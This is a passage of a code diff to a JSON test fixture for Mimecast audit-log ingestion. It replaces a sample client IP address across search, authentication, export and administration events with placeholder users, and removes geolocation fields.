"continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "search-action", - "ingested": "2021-11-25T11:34:08.372336400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw\",\"auditType\":\"Search Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:35:53+0000\",\"eventInfo\":\"Executed Search - Source: Search, Search Criteria: {\\\"keywords\\\":\\\"test\\\",\\\"mailboxes\\\":[\\\"johndoe@example.com\\\"],\\\"route\\\":\\\"ALL\\\",\\\"start\\\":\\\"2021-04-11T16:34:45+0100\\\",\\\"end\\\":\\\"2021-10-11T16:34:45+0100\\\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637509100Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw\",\"auditType\":\"Search Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:35:53+0000\",\"eventInfo\":\"Executed Search - Source: Search, Search Criteria: {\\\"keywords\\\":\\\"test\\\",\\\"mailboxes\\\":[\\\"johndoe@example.com\\\"],\\\"route\\\":\\\"ALL\\\",\\\"start\\\":\\\"2021-04-11T16:34:45+0100\\\",\\\"end\\\":\\\"2021-10-11T16:34:45+0100\\\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw", "created": "2021-10-11T15:35:53.000Z" }, @@ -493,7 +358,7 @@ "mimecast": { "application": "mimecast-case-review", "category": "case_review_logs", - "eventInfo": "Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 8.8.8.8, Application: mimecast-case-review" + "eventInfo": "Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review" } }, { @@ -507,31 +372,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "logon-authentication-failed", - "ingested": "2021-11-25T11:34:08.372337400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T14:46:10+0000\",\"eventInfo\":\"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 8.8.8.8 application : LFS\",\"category\":\"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637515300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T14:46:10+0000\",\"eventInfo\":\"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M" }, "user": { @@ -543,7 +393,7 @@ "preserve_original_event" ], "mimecast": { - "eventInfo": "Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 8.8.8.8 application : LFS", + "eventInfo": "Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS", "application": "LFS", "category": "authentication_logs", "email": { @@ -564,7 +414,7 @@ }, "event": { "action": "completed-directory-sync", - "ingested": "2021-11-25T11:34:08.372338400Z", + "ingested": "2021-12-09T15:16:03.637519200Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys\",\"auditType\":\"Completed Directory Sync\",\"user\":\"\",\"eventTime\":\"2021-10-11T13:21:06+0000\",\"eventInfo\":\"No changes found.\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys" }, @@ -590,31 +440,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "case-action", - "ingested": "2021-11-25T11:34:08.372339500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo\",\"auditType\":\"Case Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T09:19:53+0000\",\"eventInfo\":\"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637524500Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo\",\"auditType\":\"Case Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T09:19:53+0000\",\"eventInfo\":\"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo", "created": "2021-10-12T09:19:53.000Z" }, @@ -629,7 +464,7 @@ "mimecast": { "application": "mimecast-case-review", "category": "case_review_logs", - "eventInfo": "Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 8.8.8.8, Application: mimecast-case-review" + "eventInfo": "Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review" } }, { @@ -643,32 +478,17 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "reason": "Reason: Wrong password", "action": "logon-authentication-failed", - "ingested": "2021-11-25T11:34:08.372340500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:55+0000\",\"eventInfo\":\"Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 8.8.8.8, Application: mimecast-moa, Method: Office 365, Reason: Wrong password\",\"category\":\"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637543Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:55+0000\",\"eventInfo\":\"Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg", "created": "2021-10-11T22:47:55.000Z" }, @@ -683,7 +503,7 @@ "mimecast": { "application": "mimecast-moa", "category": "authentication_logs", - "eventInfo": "Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 8.8.8.8, Application: mimecast-moa, Method: Office 365, Reason: Wrong password" + "eventInfo": "Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password" } }, { @@ -697,31 +517,16 @@ "johdoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "existing-archive-task-changed", - "ingested": "2021-11-25T11:34:08.372341400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w\",\"auditType\":\"Existing Archive Task Changed\",\"user\":\"johdoe@example.com\",\"eventTime\":\"2021-10-12T08:47:54+0000\",\"eventInfo\":\"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\\\"365\\\") to new migrated connector (\\\"Sync and Recover - 365\\\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637552300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w\",\"auditType\":\"Existing Archive Task Changed\",\"user\":\"johdoe@example.com\",\"eventTime\":\"2021-10-12T08:47:54+0000\",\"eventInfo\":\"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\\\"365\\\") to new migrated connector (\\\"Sync and Recover - 365\\\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w", "created": "2021-10-12T08:47:54.000Z" }, @@ -736,7 +541,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console" } }, { @@ -750,31 +555,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "connectors-management", - "ingested": "2021-11-25T11:34:08.372342400Z", - "original": "{\"id\":\"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM\",\"auditType\":\"Connectors Management\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:53+0000\",\"eventInfo\":\"Connector creation for Microsoft O365\\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"integrations_and_apis\"}", + "ingested": "2021-12-09T15:16:03.637557100Z", + "original": "{\"id\":\"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM\",\"auditType\":\"Connectors Management\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:53+0000\",\"eventInfo\":\"Connector creation for Microsoft O365\\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"integrations_and_apis\"}", "id": "eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM", "created": "2021-10-12T08:47:53.000Z" }, @@ -789,7 +579,7 @@ "mimecast": { "application": "Administration Console", "category": "integrations_and_apis", - "eventInfo": "Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console" } }, { @@ -808,31 +598,16 @@ "johdoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "page-data-exports", - "ingested": "2021-11-25T11:34:08.372343300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U\",\"auditType\":\"Page Data Exports\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T02:27:18+0000\",\"eventInfo\":\"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :8.8.8.8,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 8.8.8.8, Application: mimecast-matfe\",\"category\":\"account_logs\"}", + "ingested": "2021-12-09T15:16:03.637561700Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U\",\"auditType\":\"Page Data Exports\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T02:27:18+0000\",\"eventInfo\":\"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U", "created": "2021-10-12T02:27:18.000Z" }, @@ -847,7 +622,7 @@ "mimecast": { "application": "mimecast-matfe", "category": "account_logs", - "eventInfo": "[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :8.8.8.8,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 8.8.8.8, Application: mimecast-matfe" + "eventInfo": "[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe" } }, { @@ -861,31 +636,16 @@ "johndoe@example.local" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "custom-report-definition-created", - "ingested": "2021-11-25T11:34:08.372344400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF\",\"auditType\":\"Custom Report Definition Created\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-11T19:53:41+0000\",\"eventInfo\":\"Action Performed - Custom Report Definition Created with name \\\"Terri test\\\" and description \\\"all user - per email report\\\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 8.8.8.8 Application: Administration Console\",\"category\":\"reporting_logs\"}", + "ingested": "2021-12-09T15:16:03.637565500Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF\",\"auditType\":\"Custom Report Definition Created\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-11T19:53:41+0000\",\"eventInfo\":\"Action Performed - Custom Report Definition Created with name \\\"Terri test\\\" and description \\\"all user - per email report\\\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"reporting_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF", "created": "2021-10-11T20:53:41.000Z" }, @@ -900,7 +660,7 @@ "mimecast": { "application": "Administration Console", "category": "reporting_logs", - "eventInfo": "Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { @@ -913,31 +673,16 @@ "John Doe" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "folder-log-entry", - "ingested": "2021-11-25T11:34:08.372345400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh\",\"auditType\":\"Folder Log Entry\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T18:23:10+0000\",\"eventInfo\":\"Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 8.8.8.8 Application: Administration Console\",\"category\":\"profile_group_logs\"}", + "ingested": "2021-12-09T15:16:03.637570300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh\",\"auditType\":\"Folder Log Entry\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T18:23:10+0000\",\"eventInfo\":\"Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"profile_group_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh", "created": "2021-10-11T19:23:10.000Z" }, @@ -950,7 +695,7 @@ "mimecast": { "application": "Administration Console", "category": "profile_group_logs", - "eventInfo": "Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 